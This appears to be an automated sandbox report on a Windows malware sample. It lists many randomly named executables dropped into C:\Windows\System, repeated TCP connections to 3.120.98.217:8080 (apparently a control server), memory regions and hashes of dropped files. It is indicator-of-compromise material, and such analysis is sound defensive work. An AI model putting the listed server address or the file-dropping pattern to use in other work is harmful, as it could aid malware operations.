C:\Windows\System\sJfeGPe.exe

C:\Windows\System\sJfeGPe.exe

C:\Windows\System\wwqGvNP.exe

C:\Windows\System\wwqGvNP.exe

C:\Windows\System\EFiLOGY.exe

C:\Windows\System\EFiLOGY.exe

C:\Windows\System\gncWsnY.exe

C:\Windows\System\gncWsnY.exe

C:\Windows\System\vSFIoxi.exe

C:\Windows\System\vSFIoxi.exe

C:\Windows\System\ypKoVbe.exe

C:\Windows\System\ypKoVbe.exe

C:\Windows\System\nDcjlbB.exe

C:\Windows\System\nDcjlbB.exe

C:\Windows\System\rCwMUel.exe

C:\Windows\System\rCwMUel.exe

C:\Windows\System\qJdNvxb.exe

C:\Windows\System\qJdNvxb.exe

C:\Windows\System\lvAELEO.exe

C:\Windows\System\lvAELEO.exe

C:\Windows\System\hHoBjdE.exe

C:\Windows\System\hHoBjdE.exe

C:\Windows\System\FxDhuzr.exe

C:\Windows\System\FxDhuzr.exe

C:\Windows\System\TPSYCCf.exe

C:\Windows\System\TPSYCCf.exe

C:\Windows\System\MFvrlps.exe

C:\Windows\System\MFvrlps.exe

C:\Windows\System\ckJQKib.exe

C:\Windows\System\ckJQKib.exe

C:\Windows\System\XDMzrYk.exe

C:\Windows\System\XDMzrYk.exe

C:\Windows\System\uErRoCB.exe

C:\Windows\System\uErRoCB.exe

C:\Windows\System\irfAAMd.exe

C:\Windows\System\irfAAMd.exe

C:\Windows\System\oPmTrtN.exe

C:\Windows\System\oPmTrtN.exe

C:\Windows\System\kIlBBzG.exe

C:\Windows\System\kIlBBzG.exe

C:\Windows\System\WifUfqK.exe

C:\Windows\System\WifUfqK.exe

C:\Windows\System\oPCmGEC.exe

C:\Windows\System\oPCmGEC.exe

C:\Windows\System\oIOLJNg.exe

C:\Windows\System\oIOLJNg.exe

C:\Windows\System\XWQQpKM.exe

C:\Windows\System\XWQQpKM.exe

C:\Windows\System\yPhPIcV.exe

C:\Windows\System\yPhPIcV.exe

C:\Windows\System\OsVTBNr.exe

C:\Windows\System\OsVTBNr.exe

C:\Windows\System\bBzNtqK.exe

C:\Windows\System\bBzNtqK.exe

C:\Windows\System\siieYLc.exe

C:\Windows\System\siieYLc.exe

C:\Windows\System\OzuXtJy.exe

C:\Windows\System\OzuXtJy.exe

C:\Windows\System\qfUiEaP.exe

C:\Windows\System\qfUiEaP.exe

C:\Windows\System\uKNZcca.exe

C:\Windows\System\uKNZcca.exe

C:\Windows\System\XKKKbyn.exe

C:\Windows\System\XKKKbyn.exe

C:\Windows\System\FKGFqpy.exe

C:\Windows\System\FKGFqpy.exe

C:\Windows\System\wkOaqga.exe

C:\Windows\System\wkOaqga.exe

C:\Windows\System\xAMEgKf.exe

C:\Windows\System\xAMEgKf.exe

C:\Windows\System\ygMkyej.exe

C:\Windows\System\ygMkyej.exe

C:\Windows\System\FMaBcbU.exe

C:\Windows\System\FMaBcbU.exe

C:\Windows\System\lDiquKg.exe

C:\Windows\System\lDiquKg.exe

C:\Windows\System\CCrVMKp.exe

C:\Windows\System\CCrVMKp.exe

C:\Windows\System\STJlend.exe

C:\Windows\System\STJlend.exe

C:\Windows\System\HQnsdhW.exe

C:\Windows\System\HQnsdhW.exe

C:\Windows\System\hRiUKkg.exe

C:\Windows\System\hRiUKkg.exe

C:\Windows\System\WXGLrPS.exe

C:\Windows\System\WXGLrPS.exe

C:\Windows\System\cIufOsS.exe

C:\Windows\System\cIufOsS.exe

C:\Windows\System\PnMgVsY.exe

C:\Windows\System\PnMgVsY.exe

C:\Windows\System\LWtnFPt.exe

C:\Windows\System\LWtnFPt.exe

C:\Windows\System\uZxMvPD.exe

C:\Windows\System\uZxMvPD.exe

C:\Windows\System\QZzvTQm.exe

C:\Windows\System\QZzvTQm.exe

C:\Windows\System\MqLmrlM.exe

C:\Windows\System\MqLmrlM.exe

C:\Windows\System\CnwcqrD.exe

C:\Windows\System\CnwcqrD.exe

C:\Windows\System\kpEardN.exe

C:\Windows\System\kpEardN.exe

C:\Windows\System\teRJqqc.exe

C:\Windows\System\teRJqqc.exe

C:\Windows\System\MAWgdHx.exe

C:\Windows\System\MAWgdHx.exe

C:\Windows\System\qhBAaZD.exe

C:\Windows\System\qhBAaZD.exe

C:\Windows\System\MAPdTfG.exe

C:\Windows\System\MAPdTfG.exe

C:\Windows\System\oUCOxWB.exe

C:\Windows\System\oUCOxWB.exe

C:\Windows\System\XYTNCWM.exe

C:\Windows\System\XYTNCWM.exe

C:\Windows\System\wUdLTCb.exe

C:\Windows\System\wUdLTCb.exe

C:\Windows\System\FUFhSPY.exe

C:\Windows\System\FUFhSPY.exe

C:\Windows\System\BRNdOEW.exe

C:\Windows\System\BRNdOEW.exe

C:\Windows\System\YnZhXKP.exe

C:\Windows\System\YnZhXKP.exe

C:\Windows\System\ttfpWuG.exe

C:\Windows\System\ttfpWuG.exe

C:\Windows\System\HScJkFw.exe

C:\Windows\System\HScJkFw.exe

C:\Windows\System\reeWpNW.exe

C:\Windows\System\reeWpNW.exe

C:\Windows\System\AzMZxdX.exe

C:\Windows\System\AzMZxdX.exe

C:\Windows\System\euglKym.exe

C:\Windows\System\euglKym.exe

C:\Windows\System\ucvKpql.exe

C:\Windows\System\ucvKpql.exe

C:\Windows\System\qWCRGXc.exe

C:\Windows\System\qWCRGXc.exe

C:\Windows\System\RinncXX.exe

C:\Windows\System\RinncXX.exe

C:\Windows\System\WlojnlQ.exe

C:\Windows\System\WlojnlQ.exe

C:\Windows\System\RwNxSQa.exe

C:\Windows\System\RwNxSQa.exe

C:\Windows\System\pqXNKXS.exe

C:\Windows\System\pqXNKXS.exe

C:\Windows\System\lGstFyF.exe

C:\Windows\System\lGstFyF.exe

C:\Windows\System\pSvnCvX.exe

C:\Windows\System\pSvnCvX.exe

C:\Windows\System\rNiBOqv.exe

C:\Windows\System\rNiBOqv.exe

C:\Windows\System\QPdNGHI.exe

C:\Windows\System\QPdNGHI.exe

C:\Windows\System\ZcjPPSu.exe

C:\Windows\System\ZcjPPSu.exe

C:\Windows\System\qSKPvFp.exe

C:\Windows\System\qSKPvFp.exe

C:\Windows\System\bSiAJBd.exe

C:\Windows\System\bSiAJBd.exe

C:\Windows\System\RmbCxob.exe

C:\Windows\System\RmbCxob.exe

C:\Windows\System\XJZCcNH.exe

C:\Windows\System\XJZCcNH.exe

C:\Windows\System\qoKmCcX.exe

C:\Windows\System\qoKmCcX.exe

C:\Windows\System\wsKzyXt.exe

C:\Windows\System\wsKzyXt.exe

C:\Windows\System\yWqAias.exe

C:\Windows\System\yWqAias.exe

C:\Windows\System\sDZAzhW.exe

C:\Windows\System\sDZAzhW.exe

C:\Windows\System\DZMxyjF.exe

C:\Windows\System\DZMxyjF.exe

C:\Windows\System\nZJYeFy.exe

C:\Windows\System\nZJYeFy.exe

C:\Windows\System\fkvmLIM.exe

C:\Windows\System\fkvmLIM.exe

C:\Windows\System\OIBaoTw.exe

C:\Windows\System\OIBaoTw.exe

C:\Windows\System\KynsClx.exe

C:\Windows\System\KynsClx.exe

C:\Windows\System\PugxzzX.exe

C:\Windows\System\PugxzzX.exe

C:\Windows\System\twMefHX.exe

C:\Windows\System\twMefHX.exe

C:\Windows\System\MCfRkLg.exe

C:\Windows\System\MCfRkLg.exe

C:\Windows\System\JiRNLVj.exe

C:\Windows\System\JiRNLVj.exe

C:\Windows\System\XUERbcx.exe

C:\Windows\System\XUERbcx.exe

C:\Windows\System\vTRqJIs.exe

C:\Windows\System\vTRqJIs.exe

C:\Windows\System\vjdiCHJ.exe

C:\Windows\System\vjdiCHJ.exe

C:\Windows\System\bdZfsIp.exe

C:\Windows\System\bdZfsIp.exe

C:\Windows\System\dSJvYot.exe

C:\Windows\System\dSJvYot.exe

C:\Windows\System\pGEspPE.exe

C:\Windows\System\pGEspPE.exe

C:\Windows\System\oSfaNKY.exe

C:\Windows\System\oSfaNKY.exe

C:\Windows\System\pwRfeaP.exe

C:\Windows\System\pwRfeaP.exe

C:\Windows\System\gEWaFGc.exe

C:\Windows\System\gEWaFGc.exe

C:\Windows\System\QfXQJla.exe

C:\Windows\System\QfXQJla.exe

C:\Windows\System\qcQgLFu.exe

C:\Windows\System\qcQgLFu.exe

C:\Windows\System\unedJxC.exe

C:\Windows\System\unedJxC.exe

C:\Windows\System\RuvFJVg.exe

C:\Windows\System\RuvFJVg.exe

C:\Windows\System\rpiBfOv.exe

C:\Windows\System\rpiBfOv.exe

C:\Windows\System\vnqVcnH.exe

C:\Windows\System\vnqVcnH.exe

C:\Windows\System\QdjoXOU.exe

C:\Windows\System\QdjoXOU.exe

C:\Windows\System\iAlszQZ.exe

C:\Windows\System\iAlszQZ.exe

C:\Windows\System\BQARuxe.exe

C:\Windows\System\BQARuxe.exe

C:\Windows\System\jnGkuad.exe

C:\Windows\System\jnGkuad.exe

C:\Windows\System\duiYDlg.exe

C:\Windows\System\duiYDlg.exe

C:\Windows\System\hpABwIc.exe

C:\Windows\System\hpABwIc.exe

C:\Windows\System\JEkhuoB.exe

C:\Windows\System\JEkhuoB.exe

C:\Windows\System\rBPTRzH.exe

C:\Windows\System\rBPTRzH.exe

C:\Windows\System\RgEpUIC.exe

C:\Windows\System\RgEpUIC.exe

C:\Windows\System\wXhnlZx.exe

C:\Windows\System\wXhnlZx.exe

C:\Windows\System\lVPKOuZ.exe

C:\Windows\System\lVPKOuZ.exe

C:\Windows\System\SQAQSWz.exe

C:\Windows\System\SQAQSWz.exe

C:\Windows\System\nKQLHbd.exe

C:\Windows\System\nKQLHbd.exe

C:\Windows\System\YKvFmQx.exe

C:\Windows\System\YKvFmQx.exe

C:\Windows\System\OoEEckk.exe

C:\Windows\System\OoEEckk.exe

C:\Windows\System\JewtPdj.exe

C:\Windows\System\JewtPdj.exe

C:\Windows\System\OUJtjVw.exe

C:\Windows\System\OUJtjVw.exe

C:\Windows\System\ESVtYIW.exe

C:\Windows\System\ESVtYIW.exe

C:\Windows\System\KKebRnT.exe

C:\Windows\System\KKebRnT.exe

C:\Windows\System\kYsDwoc.exe

C:\Windows\System\kYsDwoc.exe

C:\Windows\System\EuWyyuy.exe

C:\Windows\System\EuWyyuy.exe

C:\Windows\System\btThhzG.exe

C:\Windows\System\btThhzG.exe

C:\Windows\System\DxOZlLk.exe

C:\Windows\System\DxOZlLk.exe

C:\Windows\System\foHSJob.exe

C:\Windows\System\foHSJob.exe

C:\Windows\System\mhQRRJT.exe

C:\Windows\System\mhQRRJT.exe

C:\Windows\System\FHfOuKo.exe

C:\Windows\System\FHfOuKo.exe

C:\Windows\System\bHfYbGC.exe

C:\Windows\System\bHfYbGC.exe

C:\Windows\System\nYDdbNQ.exe

C:\Windows\System\nYDdbNQ.exe

C:\Windows\System\RfLtlvt.exe

C:\Windows\System\RfLtlvt.exe

C:\Windows\System\sXbJYQN.exe

C:\Windows\System\sXbJYQN.exe

C:\Windows\System\NKnweod.exe

C:\Windows\System\NKnweod.exe

C:\Windows\System\JEiYNqk.exe

C:\Windows\System\JEiYNqk.exe

C:\Windows\System\xDTbJWY.exe

C:\Windows\System\xDTbJWY.exe

C:\Windows\System\zRqmSaV.exe

C:\Windows\System\zRqmSaV.exe

C:\Windows\System\sgcNkdz.exe

C:\Windows\System\sgcNkdz.exe

C:\Windows\System\nZYCIzO.exe

C:\Windows\System\nZYCIzO.exe

C:\Windows\System\dgVOxcb.exe

C:\Windows\System\dgVOxcb.exe

C:\Windows\System\mtMsZsb.exe

C:\Windows\System\mtMsZsb.exe

C:\Windows\System\yfenjVi.exe

C:\Windows\System\yfenjVi.exe

C:\Windows\System\fbKwkuF.exe

C:\Windows\System\fbKwkuF.exe

C:\Windows\System\HsYZhqa.exe

C:\Windows\System\HsYZhqa.exe

C:\Windows\System\BHBvjmp.exe

C:\Windows\System\BHBvjmp.exe

C:\Windows\System\NbTpBpf.exe

C:\Windows\System\NbTpBpf.exe

C:\Windows\System\ExRpsrW.exe

C:\Windows\System\ExRpsrW.exe

C:\Windows\System\EwKqiPo.exe

C:\Windows\System\EwKqiPo.exe

C:\Windows\System\JjWiUsQ.exe

C:\Windows\System\JjWiUsQ.exe

C:\Windows\System\gtoaAKB.exe

C:\Windows\System\gtoaAKB.exe

C:\Windows\System\ySoIWYi.exe

C:\Windows\System\ySoIWYi.exe

C:\Windows\System\bHCZDns.exe

C:\Windows\System\bHCZDns.exe

C:\Windows\System\gwJogDV.exe

C:\Windows\System\gwJogDV.exe

C:\Windows\System\OtZQZSe.exe

C:\Windows\System\OtZQZSe.exe

C:\Windows\System\TcqGGHj.exe

C:\Windows\System\TcqGGHj.exe

C:\Windows\System\VWgHCSf.exe

C:\Windows\System\VWgHCSf.exe

C:\Windows\System\fhzGeHp.exe

C:\Windows\System\fhzGeHp.exe

C:\Windows\System\SIZmZYG.exe

C:\Windows\System\SIZmZYG.exe

C:\Windows\System\hDPCnIw.exe

C:\Windows\System\hDPCnIw.exe

C:\Windows\System\qYpbVfM.exe

C:\Windows\System\qYpbVfM.exe

C:\Windows\System\ZtqMRXy.exe

C:\Windows\System\ZtqMRXy.exe

C:\Windows\System\wdIhTHd.exe

C:\Windows\System\wdIhTHd.exe

C:\Windows\System\qTqITrB.exe

C:\Windows\System\qTqITrB.exe

C:\Windows\System\BHufkFA.exe

C:\Windows\System\BHufkFA.exe

C:\Windows\System\VkMymPi.exe

C:\Windows\System\VkMymPi.exe

C:\Windows\System\eyXwahA.exe

C:\Windows\System\eyXwahA.exe

C:\Windows\System\tQHtoxA.exe

C:\Windows\System\tQHtoxA.exe

C:\Windows\System\FUOxgay.exe

C:\Windows\System\FUOxgay.exe

C:\Windows\System\iLNBqbG.exe

C:\Windows\System\iLNBqbG.exe

C:\Windows\System\LRAVNSX.exe

C:\Windows\System\LRAVNSX.exe

C:\Windows\System\jPSHctF.exe

C:\Windows\System\jPSHctF.exe

C:\Windows\System\dTHAsTH.exe

C:\Windows\System\dTHAsTH.exe

C:\Windows\System\YzfSFXx.exe

C:\Windows\System\YzfSFXx.exe

C:\Windows\System\RJxREEw.exe

C:\Windows\System\RJxREEw.exe

C:\Windows\System\wgPwWor.exe

C:\Windows\System\wgPwWor.exe

C:\Windows\System\BbkwBFI.exe

C:\Windows\System\BbkwBFI.exe

C:\Windows\System\fDvmdwI.exe

C:\Windows\System\fDvmdwI.exe

C:\Windows\System\ERpoKKq.exe

C:\Windows\System\ERpoKKq.exe

C:\Windows\System\yIHPZER.exe

C:\Windows\System\yIHPZER.exe

C:\Windows\System\VfjNrkF.exe

C:\Windows\System\VfjNrkF.exe

C:\Windows\System\diEIPhX.exe

C:\Windows\System\diEIPhX.exe

C:\Windows\System\ffrQguy.exe

C:\Windows\System\ffrQguy.exe

C:\Windows\System\lOrMDnP.exe

C:\Windows\System\lOrMDnP.exe

C:\Windows\System\mHgpeOR.exe

C:\Windows\System\mHgpeOR.exe

C:\Windows\System\lCDKKfD.exe

C:\Windows\System\lCDKKfD.exe

C:\Windows\System\DQFXlJZ.exe

C:\Windows\System\DQFXlJZ.exe

C:\Windows\System\RxmGlMY.exe

C:\Windows\System\RxmGlMY.exe

C:\Windows\System\gRmSlFP.exe

C:\Windows\System\gRmSlFP.exe

C:\Windows\System\tIJOIrN.exe

C:\Windows\System\tIJOIrN.exe

C:\Windows\System\orwGDUn.exe

C:\Windows\System\orwGDUn.exe

C:\Windows\System\PbGDDNg.exe

C:\Windows\System\PbGDDNg.exe

C:\Windows\System\nFxLtvB.exe

C:\Windows\System\nFxLtvB.exe

C:\Windows\System\pCKMNKF.exe

C:\Windows\System\pCKMNKF.exe

C:\Windows\System\QyGJLaL.exe

C:\Windows\System\QyGJLaL.exe

C:\Windows\System\UNYJqJP.exe

C:\Windows\System\UNYJqJP.exe

C:\Windows\System\byWRwvM.exe

C:\Windows\System\byWRwvM.exe

C:\Windows\System\LUzzhKY.exe

C:\Windows\System\LUzzhKY.exe

C:\Windows\System\uVPLECx.exe

C:\Windows\System\uVPLECx.exe

C:\Windows\System\UKQITHz.exe

C:\Windows\System\UKQITHz.exe

C:\Windows\System\ocoRcmW.exe

C:\Windows\System\ocoRcmW.exe

C:\Windows\System\nLrJuxU.exe

C:\Windows\System\nLrJuxU.exe

C:\Windows\System\KUsePBF.exe

C:\Windows\System\KUsePBF.exe

C:\Windows\System\OdVXCzU.exe

C:\Windows\System\OdVXCzU.exe

C:\Windows\System\TyXFwHY.exe

C:\Windows\System\TyXFwHY.exe

C:\Windows\System\afoRtNW.exe

C:\Windows\System\afoRtNW.exe

C:\Windows\System\SgOVSiX.exe

C:\Windows\System\SgOVSiX.exe

C:\Windows\System\nAyzsGp.exe

C:\Windows\System\nAyzsGp.exe

C:\Windows\System\beECLLW.exe

C:\Windows\System\beECLLW.exe

C:\Windows\System\PsDqyEH.exe

C:\Windows\System\PsDqyEH.exe

C:\Windows\System\ajNfQne.exe

C:\Windows\System\ajNfQne.exe

C:\Windows\System\uDORugI.exe

C:\Windows\System\uDORugI.exe

C:\Windows\System\pLYJPkk.exe

C:\Windows\System\pLYJPkk.exe

C:\Windows\System\duDGYMj.exe

C:\Windows\System\duDGYMj.exe

C:\Windows\System\XByWnPC.exe

C:\Windows\System\XByWnPC.exe

C:\Windows\System\GnQjUIK.exe

C:\Windows\System\GnQjUIK.exe

C:\Windows\System\iwYNlap.exe

C:\Windows\System\iwYNlap.exe

C:\Windows\System\BDkTfoY.exe

C:\Windows\System\BDkTfoY.exe

C:\Windows\System\OVzdVLk.exe

C:\Windows\System\OVzdVLk.exe

C:\Windows\System\ElYrUgF.exe

C:\Windows\System\ElYrUgF.exe

C:\Windows\System\iCGnLvD.exe

C:\Windows\System\iCGnLvD.exe

C:\Windows\System\qFHfrpr.exe

C:\Windows\System\qFHfrpr.exe

C:\Windows\System\PCzVDSr.exe

C:\Windows\System\PCzVDSr.exe

C:\Windows\System\wxOMJVZ.exe

C:\Windows\System\wxOMJVZ.exe

C:\Windows\System\mXjcNCQ.exe

C:\Windows\System\mXjcNCQ.exe

C:\Windows\System\TKkaiJn.exe

C:\Windows\System\TKkaiJn.exe

C:\Windows\System\ypkCOkA.exe

C:\Windows\System\ypkCOkA.exe

C:\Windows\System\GGFZyPX.exe

C:\Windows\System\GGFZyPX.exe

C:\Windows\System\zlgpMZA.exe

C:\Windows\System\zlgpMZA.exe

C:\Windows\System\vDDSkRC.exe

C:\Windows\System\vDDSkRC.exe

C:\Windows\System\hqhrcCA.exe

C:\Windows\System\hqhrcCA.exe

C:\Windows\System\xPmYpLu.exe

C:\Windows\System\xPmYpLu.exe

C:\Windows\System\uriHCIT.exe

C:\Windows\System\uriHCIT.exe

C:\Windows\System\CBbCXGH.exe

C:\Windows\System\CBbCXGH.exe

C:\Windows\System\AEgYQap.exe

C:\Windows\System\AEgYQap.exe

C:\Windows\System\SXPqnNN.exe

C:\Windows\System\SXPqnNN.exe

C:\Windows\System\HmqeaUH.exe

C:\Windows\System\HmqeaUH.exe

C:\Windows\System\xeGBDlj.exe

C:\Windows\System\xeGBDlj.exe

C:\Windows\System\yNWLAuf.exe

C:\Windows\System\yNWLAuf.exe

C:\Windows\System\vcTEDkb.exe

C:\Windows\System\vcTEDkb.exe

C:\Windows\System\EZErPTO.exe

C:\Windows\System\EZErPTO.exe

C:\Windows\System\rKPmvxm.exe

C:\Windows\System\rKPmvxm.exe

C:\Windows\System\OGllLtA.exe

C:\Windows\System\OGllLtA.exe

C:\Windows\System\uzSzOcC.exe

C:\Windows\System\uzSzOcC.exe

C:\Windows\System\JZsSIpG.exe

C:\Windows\System\JZsSIpG.exe

C:\Windows\System\wHJJQZC.exe

C:\Windows\System\wHJJQZC.exe

C:\Windows\System\AdnIWCq.exe

C:\Windows\System\AdnIWCq.exe

C:\Windows\System\Klxprah.exe

C:\Windows\System\Klxprah.exe

C:\Windows\System\TNgqTIZ.exe

C:\Windows\System\TNgqTIZ.exe

C:\Windows\System\CpOPfFj.exe

C:\Windows\System\CpOPfFj.exe

C:\Windows\System\XjTKVqs.exe

C:\Windows\System\XjTKVqs.exe

C:\Windows\System\JyklACH.exe

C:\Windows\System\JyklACH.exe

C:\Windows\System\VFqBYoe.exe

C:\Windows\System\VFqBYoe.exe

C:\Windows\System\upcvDDt.exe

C:\Windows\System\upcvDDt.exe

C:\Windows\System\eIjHOPV.exe

C:\Windows\System\eIjHOPV.exe

C:\Windows\System\UoNSVud.exe

C:\Windows\System\UoNSVud.exe

C:\Windows\System\EEDKDnj.exe

C:\Windows\System\EEDKDnj.exe

C:\Windows\System\tNlnlTe.exe

C:\Windows\System\tNlnlTe.exe

C:\Windows\System\vyYUARx.exe

C:\Windows\System\vyYUARx.exe

C:\Windows\System\GWSiHvl.exe

C:\Windows\System\GWSiHvl.exe

C:\Windows\System\gqQQLrE.exe

C:\Windows\System\gqQQLrE.exe

C:\Windows\System\tpuYDQJ.exe

C:\Windows\System\tpuYDQJ.exe

C:\Windows\System\rzTylOp.exe

C:\Windows\System\rzTylOp.exe

C:\Windows\System\JCuqVXf.exe

C:\Windows\System\JCuqVXf.exe

C:\Windows\System\LMWDSij.exe

C:\Windows\System\LMWDSij.exe

C:\Windows\System\rtdxoOW.exe

C:\Windows\System\rtdxoOW.exe

C:\Windows\System\ahTqeKb.exe

C:\Windows\System\ahTqeKb.exe

C:\Windows\System\WFuMrst.exe

C:\Windows\System\WFuMrst.exe

C:\Windows\System\iadqoij.exe

C:\Windows\System\iadqoij.exe

C:\Windows\System\MDQoEhu.exe

C:\Windows\System\MDQoEhu.exe

C:\Windows\System\jkUJDkr.exe

C:\Windows\System\jkUJDkr.exe

C:\Windows\System\RIJkNBW.exe

C:\Windows\System\RIJkNBW.exe

C:\Windows\System\OgVTaat.exe

C:\Windows\System\OgVTaat.exe

C:\Windows\System\tdVGzUM.exe

C:\Windows\System\tdVGzUM.exe

C:\Windows\System\cZbTvMq.exe

C:\Windows\System\cZbTvMq.exe

C:\Windows\System\nDYJiGp.exe

C:\Windows\System\nDYJiGp.exe

C:\Windows\System\EsZwbZy.exe

C:\Windows\System\EsZwbZy.exe

C:\Windows\System\HWfJRVf.exe

C:\Windows\System\HWfJRVf.exe

C:\Windows\System\SqVnQBC.exe

C:\Windows\System\SqVnQBC.exe

C:\Windows\System\dWknOcy.exe

C:\Windows\System\dWknOcy.exe

C:\Windows\System\mIWKprA.exe

C:\Windows\System\mIWKprA.exe

C:\Windows\System\DiYeZWG.exe

C:\Windows\System\DiYeZWG.exe

C:\Windows\System\hHttNNU.exe

C:\Windows\System\hHttNNU.exe

C:\Windows\System\dVPhceC.exe

C:\Windows\System\dVPhceC.exe

C:\Windows\System\Vuzddcs.exe

C:\Windows\System\Vuzddcs.exe

C:\Windows\System\kOXqhbB.exe

C:\Windows\System\kOXqhbB.exe

C:\Windows\System\YTLJQiD.exe

C:\Windows\System\YTLJQiD.exe

C:\Windows\System\NUbhfyE.exe

C:\Windows\System\NUbhfyE.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
US 52.111.227.11:443 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/3884-0-0x00007FF6FE1E0000-0x00007FF6FE5D2000-memory.dmp

memory/3884-1-0x000001BBFEA20000-0x000001BBFEA30000-memory.dmp

C:\Windows\System\WEdWpfQ.exe

MD5 78e1102d6b5693de605e1b08d449989b
SHA1 943ed191c34d270a796fba9713ff4279292364a7
SHA256 798c3658fbd5454e6f7ee0983796224394b64d05ed429666364abb8b28420fe4
SHA512 1ffd41710f40f611bb0c057a39b66e298032fd35b9525e0f813c2c8a7862573be6a74d084884a3cd542ade1096dfc77f34c44c64199a6a273e3df9d3d67c885f

memory/2116-12-0x00007FF8C0683000-0x00007FF8C0685000-memory.dmp

memory/4780-11-0x00007FF6500F0000-0x00007FF6504E2000-memory.dmp

C:\Windows\System\SlUzHUI.exe

MD5 3d0c00e52e95708c82cd63126dc4ef3f
SHA1 e23f9cf446a4d5677822b5a9172bdcd531e55e8c
SHA256 9a51d4e646e7b1fafd3b478147bcf5d0dfcdf2c37e77b39707efb91c0bf1d59c
SHA512 37a8c52337c6dbc41a3dd0ca6096bda23243add6de880af449cacf09ebc9a761c2fddff04b3002ef33ae6ffa883a4e2a122a37826533cc9c692660b2ce57420f

C:\Windows\System\ffdmQaR.exe

MD5 32c9bec18336d339252b720715692b9a
SHA1 2482a442f7797d0d853db74ddd68b1387ab51e39
SHA256 4c7db4d8500c1bb027fc660ad42235dc3a341473ded80b7ef30aabe0b7efe856
SHA512 63715852b4a366ab23bf22aecb8fe6420b607886b35fe74c7533a909999828de3a11e090b103535ea9641524c9e2d6827756d1672668c3864541701f29d7a232

C:\Windows\System\EDUyNjK.exe

MD5 072fe71c667985f5102130f6d56c6288
SHA1 ad107e2240ce652c9e6531fc166d92aed8ce97c6
SHA256 bf1930d1210e568c44df7084ed6231df2ff9c49fd2c432839bfaa1c87f2a75ca
SHA512 028c30637c1960f392b5adf58400015948606c20fed0e4167a9e127a3090a8e20a169c0724695e8531bc2547eeaa5c818ba7995483eabb6a6c14667330e108a5

C:\Windows\System\bQZKyym.exe

MD5 d46acdb1a7bf4d27213c32b7336d0d8f
SHA1 144e71c0981a86172bab1f189337936194ed87d5
SHA256 811c5bf3f96a320793879b5774708757ce340aa922e458e53afa0510946feea1
SHA512 551625c7d2017c268dd36b7ae7f9a8de1d7d2cfda1af9ce81069005bf90e1da2414eda7439db4250c18479825d4a723e476233908a1e9b0ff52d9d4f95f93e96

memory/1756-504-0x00007FF73FA90000-0x00007FF73FE82000-memory.dmp

memory/1684-503-0x00007FF786600000-0x00007FF7869F2000-memory.dmp

memory/3636-903-0x00007FF6F4810000-0x00007FF6F4C02000-memory.dmp

memory/4576-1023-0x00007FF72DEE0000-0x00007FF72E2D2000-memory.dmp

memory/3268-1137-0x00007FF7436A0000-0x00007FF743A92000-memory.dmp

memory/2116-1899-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmp

memory/5008-1318-0x00007FF6D6480000-0x00007FF6D6872000-memory.dmp

memory/4524-1315-0x00007FF6B58C0000-0x00007FF6B5CB2000-memory.dmp

memory/4756-905-0x00007FF6ED6D0000-0x00007FF6EDAC2000-memory.dmp

memory/3364-804-0x00007FF6F7B40000-0x00007FF6F7F32000-memory.dmp

memory/452-801-0x00007FF7B3210000-0x00007FF7B3602000-memory.dmp

memory/2852-749-0x00007FF69D620000-0x00007FF69DA12000-memory.dmp

memory/2744-743-0x00007FF79E000000-0x00007FF79E3F2000-memory.dmp

memory/100-676-0x00007FF657E20000-0x00007FF658212000-memory.dmp

memory/4884-671-0x00007FF65A7F0000-0x00007FF65ABE2000-memory.dmp

memory/2592-614-0x00007FF641DE0000-0x00007FF6421D2000-memory.dmp

memory/4992-442-0x00007FF783440000-0x00007FF783832000-memory.dmp

memory/2840-376-0x00007FF69A690000-0x00007FF69AA82000-memory.dmp

memory/1616-375-0x00007FF7B77F0000-0x00007FF7B7BE2000-memory.dmp

memory/1284-307-0x00007FF710A90000-0x00007FF710E82000-memory.dmp

memory/1984-274-0x00007FF7EB190000-0x00007FF7EB582000-memory.dmp

memory/2116-264-0x0000023BFA980000-0x0000023BFA9A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s54p5xsl.w3w.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2764-270-0x00007FF6C7310000-0x00007FF6C7702000-memory.dmp

memory/1604-207-0x00007FF7F7A30000-0x00007FF7F7E22000-memory.dmp

C:\Windows\System\rPxbhow.exe

MD5 a76a2d88b5168138659c5993bf30fe34
SHA1 b3f8191c4f35fd3a715b116c38611817ff040ca8
SHA256 06434abe2cc6ac56a91aa75e4fd74a45ee9da974e4920f3d2d4b9528779caa5c
SHA512 a121e90a83f7571e0a52fc6a0fb1a8a662d17bb440e3a25b8544929e63ddc34b06abd933100dde907041da3cae875aac403e97e4914763628122d5378a433abb

C:\Windows\System\YWGQDFk.exe

MD5 8f4e78296edc21101677f34eb0f49209
SHA1 953cd58ac8648a8ec9a6f4a4594aee8264d9fec5
SHA256 96d076bccdee282558b9f95662a9a1fa0cfaf1790501bef4e80d2d2d94944b83
SHA512 68ef504751178a2f9e8e07ef9fb3d793afe8028c5563eb0831debc5371cadba070123ead50947c2d7d6ac5af1ad4abfd53621894261687c4ccbbb7a7492d352b

C:\Windows\System\sZVhXYQ.exe

MD5 47649143bddb976d6c6a51b42b0e7010
SHA1 9a226bfbfca370a84353db53631bd0278331a44d
SHA256 434cb5127df793ac2320223140b16cfffa51dc6e919a924c93bf6e9a0bd03e81
SHA512 eaee6b9171471b5a02088bb7704776bf76ad2ae6dff3d8bf014cd6dd54ba17a361148a4a9d5dde47f61702cd318d74abc57065db65d057b61458cca23c21895b

C:\Windows\System\HRsrSoo.exe

MD5 00de64a2f609bb7f384ce0cbc9ab82f1
SHA1 480335045b95ba1fa1f50af8a6af1dacb6d5ace3
SHA256 7d1ea5627791df0c1e6d95a0820f8a7ae1e2449ea24332ae5fdd930a008149d5
SHA512 9f189c95f5636002555317f4efe0e0bb138ac1b32c5e07b3f955ad61242c0873659d7a87d308feed0ac0a479a1a764959b222b29faeec4b55671ff72473e4f60

C:\Windows\System\XIgaUXX.exe

